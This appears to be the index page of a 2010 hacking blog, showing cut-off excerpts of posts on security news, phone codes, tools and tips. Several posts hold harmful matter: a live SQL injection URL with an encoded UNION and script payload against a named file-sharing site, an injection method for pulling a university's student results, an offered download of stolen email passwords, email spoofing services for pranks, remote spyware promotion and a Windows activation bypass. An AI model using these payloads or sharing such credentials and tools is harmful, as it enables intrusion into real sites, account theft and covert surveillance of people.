Friday, December 17, 2010

Google is going to map human anatomy

Google after mapped the entire earth as google earth , now planned to map into ourself , it is creating a project which enables the viewer to view the human anatomy . It uses the technology called Web GL , which  is used to render 2d and 3d graphics in web browser without the need for flash etc . This is a google labs project , click the below link to goto that site , http://bodybrowser.googlelabs.com Use a web browser such as Google chrome to view the above site , it is a JavaScript intensive page...

Thursday, December 16, 2010

rapidog website hack , bug found .

Hi viewers recently a bug in rapidog website which is a file sharing site , the bug includes both sql injection + xss attacks , go to  the below link and enter the captcha code , you can see the hack with your eyes , http://rapidog.com/search/file.php?file_id=-12351668%20union%20select%201,concat%280x68,0x61,0x63,0x6B,0x65,0x64,0x20,0x62,0x79,0x20,0x74,0x68,0x65,0x20,0x72,0x61,0x73,0x63,0x61,0x6C,0x20,0x2C,0x20,0x3C,0x61,0x20,0x68,0x72,0x65,0x66,0x3D,0x22,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x22,0x3E,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x3C,0x2F,0x61,0x3E,0x3C,0x73,0x63,0x72,0x69,0x70,0x74,0x3E,0x61,0x6C,0x65,0x72,0x74,0x28,0x27,0x68,0x61,0x63,0x6B,0x65,0x64,0x20,0x62,0x79,0x20,0x74,0x68,0x65,0x20,0x72,0x61,0x73,0x63,0x61,0x6C,0x20,0x2C,0x20,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x74,0x33,0x63,0x68,0x2E,0x69,0x6E,0x27,0x29,0x3B,0x3C,0x2F,0x73,0x63,0x72,0x69,0x70,0x74,0x3E%29,3,4,5,6,7,8%20from%20information_schema.tables%20-- Bug...

Sunday, December 12, 2010

WikiLeaks backlash: The first global cyber war has begun, claim hackers

WikiLeaks founder Julian Assange. Photograph: Lennart Preiss/AP He is one of the newest recruits to Operation Payback. In a London bedroom, the 24-year-old computer hacker is preparing his weaponry for this week's battles in an evolving cyberwar. He is a self-styled defender of free speech, his weapon a laptop and his enemy the US corporations responsible for attacking the website WikiLeaks. He had seen the flyers that began springing up on the web in mid-September. In chatrooms, on discussion boards and inboxes from Manchester to New York to Sydney the grinning face of a Guy Fawkes mask had appeared with a call to arms. Across the world a battalion of hackers was being summoned. "Greetings, fellow...

Thursday, December 9, 2010

Remote Spy Software

Are you looking for the Best Remote Spy Software? Do you need to spy on your remote computer without the need for physical access? But wait! Before you go for any remote spy software you should read our shocking reviews! Well today there exists hundreds of spy software on the market and most of them are no more than a scam. Also most of these spy softwares do not support the remote monitoring feature at all. Hence as a result of these substandard products people often end up buying some crap spy software which fail to meet their needs. However there exists only a handful of Spy Softwares that support both remote installation and remote monitoring feature. In order to help our readers to choose the best remote spy software, we decided to test and review some of the top remote spy software...

Wednesday, December 8, 2010

Email spoofing .

Email spoofing is a term used to describe e-mail activity in which the sender address and other parts of the e-mail are altered and this is generally combined with phishing by hackers. LIST OF SITES WHICH PROVIDE FAKE EMAIL SERVICES 1) deadfake.com All you need to do is click Send Fake Email Tab and then enter From and to address and then type the mail and send it.Guys don't do this to earn any financial benefits and this is purely for educational purpose.Just prank you friends. 2) fakesend.com This is another famous site which offer the same service.No need to create a user account you just need to enter the concerned fields and send the mail. 3) hoaxmail.co.uk This is a very famous site which provides both email spoofing...

Monday, December 6, 2010

sim card cloning , the state of the art.

Hi t3ch viewers , i am here with a brand new way of hack  called sim card cloning , where a sim card similar to the orginal one can be created , and call / sms can be made using any one the sim card . This is a punishable by law , so try at your home and don't try to implement it publicly . In this video, Limor and Philip from Citizen Engineer, demonstrate how to clone SIM cards and hack payphones to do interesting things. The SIM card section starts with a primer on how the authentication works in the GSM world - challenge / response where the SIM contains the encryption key which is used to encrypt the challenge sent by the base station. Now the problem seems to be that there is no way to retrieve the encryption key directly from the SIM cards and the only way (which also only...

Denial of services . what is it ?how it is implemented ?

Hope u all heard that wiki leaks web site is made unavailable  due to various attacks , one of such attacks is denial of service attack , where a high amount of traffic is sen to the website , thus disabling the site being accessed by other , lets now check about this attack .What is a denial-of-service (DoS) attack?In a denial-of-service (DoS) attack, an attacker attempts to prevent legitimate users from accessing information or services. By targeting your computer and its network connection, or the computers and network of the sites you are trying to use, an attacker may be able to prevent you from accessing email, websites, online accounts (banking, etc.), or other services that rely on the affected computer. The most common and obvious type of DoS attack occurs when an attacker "floods"...

Saturday, December 4, 2010

Google Chrome OS Netbook Set for Dec. 7 Unveiling

Google will unveil a Chrome OS netbook Dec. 7. Key questions include: when can the public get them, and will the iPad and Android machines allow them to prosper? Google is hosting an event Dec. 7 where it will likely demonstrate a netbook based on its long-awaited Chrome operating system.Chrome OS is Google's support platform for its increasingly popular Chrome Web browser, which accounts for 9.27 percent of browser use, according to Net Applications.Google intends the platform to run on netbooks and other machines with keyboards, booting up in seconds as an alternative to computers based on Microsoft Windows, Apple Mac OS and Linux.Google late Dec. 3 e-mailed eWEEK a media invitation to a Chrome-related event,...

SQL bug in Madurai kamraj university site!

SQL injection discovered  by Hussain , on Madurai Kamraj University site , this allow the user to see the results of all students without specifying  a register number . POC: 1. link : http://www.mkuniversity.org/results_new.php 2. Select any course , instead of register number copy and paste this code and press get results button . 3.You can see results of all student without requiring  a register number , this works on similar site , to bypass authentication. this injection can be also used to insert malicious sql command which can delete all the marks of the student from the database . :( Enjoy...

Friday, December 3, 2010

China phone , fly phone , benq and other mobiles all in one code .

Hi viewers here are some of the service code for various china mobiles , hope u enjoy the collection ALL CHINA MOBILES CODE *#66*# Set Factory Mode CONFIRMED *#8375# Show Software Version CONFIRMED *#1234# A2DP ACP Mode CONFIRMED *#1234# A2DP INT Mode CONFIRMED *#0000# + Send : Set Default Language CONFIRMED *#0007# + Send : Set Language to Russian CONFIRMED *#0033# + Send : Set Language to French CONFIRMED *#0034# + Send : Set Language to Spanish CONFIRMED *#0039# + Send : Set Language to Italian CONFIRMED *#0044# + Send : Set Language to English CONFIRMED *#0049# + Send : Set Language to German CONFIRMED *#0066# + Send : Set Language to Thai CONFIRMED *#0084# + Send : Set Language to Vietnamese CONFIRMED *default user code: 1122, 3344, 1234, 5678 Engineer...

Back door in ProFTPD FTP server

Back door in ProFTPD FTP serverUnknown attackers penetrated the server hosting the open source ProFTPD FTP server project and concealed a back door in the source code. The back door provides the attackers with complete access to systems on which the modified version of the server has been installed. On installation, the modified version informs the group behind the back door by contacting an IP address in the Saudi Arabia area. Entering the command 'HELP ACIDBITCHEZ' results in the modified server displaying a root shell.Ironically, to place their back door, the attackers used a zero day vulnerability in ProFTPD itself, which the developers were using to make the source code available to users. The modification...

Mind blowing google tips .

Google offers you a wide variety of helpful search keywords , check it out !!! 1.Get Whether Information from Google. 2.listen to music on google . 3.Use google as a calculator . 4.search your mail effectively . 5. get the current time from google . 6. get notifications from google when u receive a mail . This Google Chrome extension sends a pop-up notification to your desktop whenever you receive a new Gmail message. There is also an application,Google Notifier for Mac, that "shows you alerts in your menu bar, so you can see when you have new Gmail messages or upcoming Google Calendar events without having to open a web browser." 7. get directly to your search. Google's "I'm Feeling Lucky" button,...

Thursday, December 2, 2010

40 Pakistani government websites hacked

Nearly 40 Pakistani government websites were cyber attacked Tuesday by a group of hackers calling itself the “Indian Cyber Army,” The Express Tribune reports.The websites were hosted on a single server, which allowed the hackers to take over multiple sites simultaneously, according to an email sent by the hackers. The hackers defaced several of the websites, displaying messages such as “Indian Cyber Army owns you. Rest in peace, the heroes of 26/11 who laid their precious lives for the country … because of some Pakistanis, whole of Pakistan is being given bad words.”Nov. 26, 2008 marks the date when more than 10 coordinated shooting and bombing attacks occurred across Mumbai by Islamic terrorists from Pakistan. The attacks began Nov. 26, 2008, and lasted three days, killing at least...

Windows 7 rearm hack

Most of you might be aware of the fact that it is possible to use Windows 7 and Vista for 120 days without activation. This is actually possible using the slmgr -rearm command which will extend the grace period from 30 days to 120 days. However in this post I will show you a small trick using which it is possible to use Windows 7 without activation for approximately an year! Here is a way to do that. 1. Goto “Start Menu -> All Programs -> Accessories” . Right click on “Command Prompt” and select “Run as Administrator“. If you are not the administrator then you are prompted to enter the password, or else you can proceed to step-2. 2. Now type the following command and hit enter slmgr -rearm3. You will be prompted to restart the computer. Once restarted the trial period will be...

Wednesday, December 1, 2010

Programming competition at Bengalooru .

Any programmer cum Hacker in and around bangalooru can participate in this contest by a community called Random Hacks of Kindness.  It is a world level contest , where  participators are request to give   innovative ideas and design application that would help a large community of peoples .Example tsunami predictor  etc .The best innovative idea and application will be given cash prizes . Sponsors :  Microsoft , NASA , Google, Yahoo , World Bank . Click here for more info and registration : http://www.rhok.org/2010/10/registration-for-rhok-2-is-open/ Register fast. Other locations of the event worldwide Main Stages:Aarhus, Denmark Bangalore, India (Dec. 4 only) Chicago, Illinois, U.S.A. Nairobi, Kenya New York, New York, U.S.AGlobal Satellites:Atlanta, Georgia,...

XSS bug on infolinks website spotted by rascal .

Before introducing the bugs , i want to say about info links site , about this infolinks.com Infolinks intelligently scans web pages using its dynamic proprietary algorithm and converts carefully selected keywords into relevant Pay Per Click (PPC) in-text ads. These ads appear as double underlined hyperlinks in the Web content itself. The process of integrating in-text ads into websites is short and simple. The basic integration requires the insertion of one line of Javascript code into the website’s html.Infolinks in-text ads are seen on thousands of websites and are used by content based web publishers as an effective means to monetize.Infolinks was established in 2007 and is headquarter...

Biggest collection of Hacked Emails and Passwords .

The ultimate hack by the Rascal , check it outIt is a collection of 100s of user IDs and passwords hacked by me Download Link: http://www.mediafire.com/?janme4xzkgxq8ox Password is: t3ch...

How to Trace Mobile Numbers

With the rapid growth of mobile phone usage in recent years, we have often observed that the mobile phone has become a part of many illegal and criminal activities. So in most cases, tracing the mobile number becomes a vital part of the investigation process. Also sometimes we just want to trace a mobile number for reasons like annoying prank calls, blackmails, unknown number in a missed call list or similar. Even though it is not possible to trace the number back to the caller, it is possible to trace it to the location of the caller and also find the network operator. Just have a look at this page on tracing Indian mobile numbers from Wikipedia. Using the information provided on this page, it is possible to certainly trace any mobile number from India and find out the location (state/city)...

best security tools .

here are some of the popular security / hacking tools that range from port scanning to password cracking , check it out .1. NmapI think everyone has heard of this one, recently evolved into the 4.x series.Nmap (“Network Mapper”) is a free open source utility for network exploration or security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. Nmap uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. Nmap runs on most types of comuters and both console and graphical versions are available....

Page 1 of 2112345Next
Twitter Delicious Facebook Digg Stumbleupon Favorites More

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes | Best Web Host